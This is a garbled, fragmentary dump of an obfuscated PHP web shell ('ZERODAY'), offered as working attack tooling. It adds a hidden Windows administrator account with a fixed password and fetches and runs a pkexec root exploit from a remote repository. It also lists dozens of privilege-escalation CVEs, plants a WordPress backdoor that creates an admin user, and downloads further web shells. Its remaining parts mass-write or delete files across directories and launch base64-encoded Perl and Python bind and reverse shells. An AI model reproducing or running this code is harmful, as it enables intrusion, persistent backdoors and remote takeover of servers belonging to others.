ZERODAY
";if(isset($azu3293050475['path'])){$sol190089999=$azu3293050475['path'];chdir($sol190089999);}else{$sol190089999=$wje845731916();}$sol190089999=str_replace('\','/',$sol190089999);$oxk2344257041=explode('/',$sol190089999);foreach($oxk2344257041 as $qlb3208210256=>$daz2151571073){if($daz2151571073==''&&$qlb3208210256==0){$fov3904355907=true;echo ":/";continue;}if($daz2151571073=='')continue;echo "".$daz2151571073."/";}$oue2843178896=scandir($sol190089999);echo " [ ".w($sol190089999,p($sol190089999))." ]";$sre3688262367=(function_exists('mysql_connect'))?"
Information Server
System: ".php_uname()."
Software:".$_SERVER["SERVER_SOFTWARE"]."
PHP Version:".PHP_VERSION." PHP Os: ".PHP_OS."
Server IP:".gethostbyname($_SERVER['HTTP_HOST'])."
Your IP:".ia()."
User:$zyw2375276105 ($yjx1402668550) | Group: $cvy1841317061 ($fee1278832920)
Safe Mode: $jyg1992828207
MYSQL: $sre3688262367 | PERL: $uvh719472250 | PYTHON: $qjq1195352721 | WGET: $mfx3587616859 | CURL: $tov65018701 | GCC: $gjz682757169 | PKEXEC: $hfc3458825191
Disable Function:
Software:
PHP Version:
Server IP:
Your IP:
User:
Safe Mode: $jyg1992828207
MYSQL: $sre3688262367 | PERL: $uvh719472250 | PYTHON: $qjq1195352721 | WGET: $mfx3587616859 | CURL: $tov65018701 | GCC: $gjz682757169 | PKEXEC: $hfc3458825191
Disable Function:
$jzk1561703635
'.exe_root("net user shizuo b4b1raga#1337 /add",$sol190089999).exe_root("net localgroup administrators shizuo /add",$sol190089999).'
If there is no "Access is denied." output, chances are that you have succeeded in creating a user here. Just log in using the username and password below.
hosts: '.gethostbyname($_SERVER["HTTP_HOST"]).'
username: shizuo
password: b4b1raga#1337
'.exe_root("curl https://gitlab.com/jasonrondiguez/a/-/raw/main/localr00000t/pwnkit -o cats;chmod +x cats;./cats id",$sol190089999).'
If successful, u can run as root user using command: ./cats "YOUR COMMAND"
CVE N/A | Sudo prompt overflow in v1.5.7 to 1.6.5p2
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
CVE-2003-0127 | Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)
CVE-2004-0077 | Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation
CVE-2004-1235 | Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)
CVE N/A | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation
CVE-2005-0736 | Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation
CVE-2005-1263 | Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow
CVE-2006-2451 | Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
CVE-2006-3626 | Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation
CVE N/A | Compress v4.2.4 local test exploit
CVE N/A | Local GNU Awk 3.1.0-x proof of concept exploit
EDB-ID-4756 | Linux Kernel < 2.6.11.5 Bluetooth Stack Localroot Exploit
CVE-2008-0600 | Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
CVE-2008-0900 | Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
CVE-2008-4210 | Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
CVE-2009-1185 | Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
CVE-2009-1337 | Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation CVE-2009-2692 | Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
CVE-2009-2698 | Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
CVE-2009-3547 | Linux 2.6.x fs/pipe.c Local Privilege Escalation
CVE-2010-1146 | ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation
CVE-2010-2959 | Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation
CVE-2010-3081 | Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation
CVE-2010-3301 | Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
CVE-2010-3437 | Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure
CVE-2010-3904 | Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
CVE-2010-4073 | Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation
CVE-2010-4258 | Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
CVE-2010-4347 | Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation CVE-2011-1021 | Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
CVE-2011-2777 | Acpid 1:
2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation
CVE-2011-1485 | pkexec - Race Condition Privilege Escalation
EDB-ID-18071 | Calibre E-Book Reader - Local Privilege Escalation
EDB-ID-17391 | Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation
EDB-ID-15944 | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)
CVE-2012-0056 | Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation
CVE-2012-3524 | libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation
CVE-2012-0809 | sudo 1.8.0 < 1.8.3p1 - Format String
CVE-2013-0268 | Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation
CVE-2013-1763 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
CVE-2013-1858 | Linux Kernel 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation
CVE-2013-2094 | Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)
CVE-2014-0038 | Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
CVE-2014-0196 | Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation
CVE-2014-3153 | Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
CVE-2014-4014 | Linux Kernel 3.13 - SGID Privilege Escalation
CVE-2014-4699 | Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation
CVE-2014-5284 | OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation CVE-2015-1328 | Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
CVE-2015-7547 | glibc - 'getaddrinfo' Stack Buffer Overflow (PoC) CVE-2016-0728 | Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)
CVE-2016-2384 | Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation
CVE-2016-5195 | Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
CVE-2016-8655 | Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)
CVE-2016-9793 | Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation
CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation
CVE-2017-6074 | Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
CVE-2017-7308 | Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
CVE-2017-7494 | Samba 3.5.0 - Remote Code Execution
CVE-2017-7533 | Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
CVE-2017-16939 | Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
CVE-2017-16995 | Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
CVE-2017-1000112 | Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)
CVE-2017-1000367 | Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation
CVE-2018-1000001 | glibc < 2.26 - 'getcwd()' Local Privilege Escalation
CVE-2019-7304 | snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)
CVE-2019-13272 | Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation
IBM AIX
CVE-2013-4011 - IBM AIX 6.1 / 7.1 Localroot Privilege Escalation
FreeBSD
EDB-ID-1311 | FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure
CVE-2008-3531 | FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
CVE-2008-5736 | FreeBSD 6.4 - Netgraph Privilege Escalation
CVE-2009-3527 | FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition
CVE-2009-4146 | FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation
EDB-ID-9860 | FreeBSD 7.2 - VFS/devfs Race Condition
CVE-2010-2020 | FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation
CVE-2010-2693 | FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation
CVE-2010-4210 | FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation
CVE-2011-4062 | FreeBSD - UIPC socket heap Overflow (PoC)
CVE-2011-4122 | OpenPAM - 'pam_start()' Local Privilege Escalation
CVE-2011-4862 | TelnetD encrypt_keyid - Function Pointer Overwrite
CVE-2012-0217 | FreeBSD 8.3 - 9.0 amd64 Privilege Escalation
EDB-ID-28718 | FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation
CVE-2013-2171 | FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
";}if($azu3293050475['id']=='getools'){ob_implicit_flush();ob_end_flush();s();echo '
";function wso($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babiwso.php')){echo"
";function alfa($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babialfa.php')){echo"
";function marijuana($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babimarijuana.php')){echo"
function shizuoadmin(){
$login = 'shizuo';
$passw = 'shizuo#1337';
$email = 'g00glesec@proton.me';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','shizuoadmin');
example: https://site.gov/wp-content/themes/[theme name/functions.php
";function babidetect($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('babidetect.php')){echo"
Grab Config by shizuo
";function adminer($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('adminer.php')){echo"
";file_put_contents($zfh1659275802,$sls386395195);$vvr311197333=mass_all($zac464807025,$vgn3319867140,$sls386395195);}}}}}}function mass_onedir($oex3131800080,$vgn3319867140,$sls386395195){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){file_put_contents($zfh1659275802,$sls386395195);}elseif($oib1823692007==='..'){file_put_contents($zfh1659275802,$sls386395195);}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){echo"[
";file_put_contents($zfh1659275802,$sls386395195);}}}}}}if($azu3293050475['start']){if($azu3293050475['tipe']=='mass'){mass_all($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}elseif($azu3293050475['tipe']=='onedir'){mass_onedir($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}}s();echo '
";unlink($zfh1659275802);$vvr311197333=mass_delete($zac464807025,$vgn3319867140);}}}}}}}if($azu3293050475['start']){mass_delete($azu3293050475['d_dir'],$azu3293050475['d_file']);}s();echo '
";if($azu3293050475['bpl']){$giz1175939814=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");$lzk4268976141=@fopen('bp.pl','w');fwrite($lzk4268976141,$giz1175939814);$bpp3119148441=exe("perl bp.pl ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"
$amk4049756767".exe("ps aux | grep bp.pl")."";unlink("bp.pl");}if($azu3293050475['bc']=='perl'){$jkk3265866552=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");$trn2294707203=@fopen('bc.pl','w');fwrite($trn2294707203,$jkk3265866552);$bpp3119148441=exe("perl bc.pl ".$azu3293050475['server']." ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"
$amk4049756767".exe("ps aux | grep bc.pl")."";unlink("bc.pl");}if($azu3293050475['bc']=='python'){$jvw1833259582=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");$emi294062401=@fopen('bcpy.py','w');fwrite($emi294062401,$jvw1833259582);$eyg4228488635=exe("python bcpy.py ".$azu3293050475['server']." ".$azu3293050475['port']);sleep(1);echo"
$ezv608682059".exe("ps aux | grep bcpy.py")."";unlink("bcpy.py");}echo "
";}if($azu3293050475['id']=='cmd'){s();echo '
";if($enu794565824):echo '
';elseif(!$enu794565824&&$_SERVER['REQUEST_METHOD']=='POST'):echo '
';endif;}if($azu3293050475['id']=='upload'){s();echo '$'.htmlspecialchars($_POST['cmd']).' '.htmlspecialchars($enu794565824,ENT_QUOTES,'UTF-8').'
No result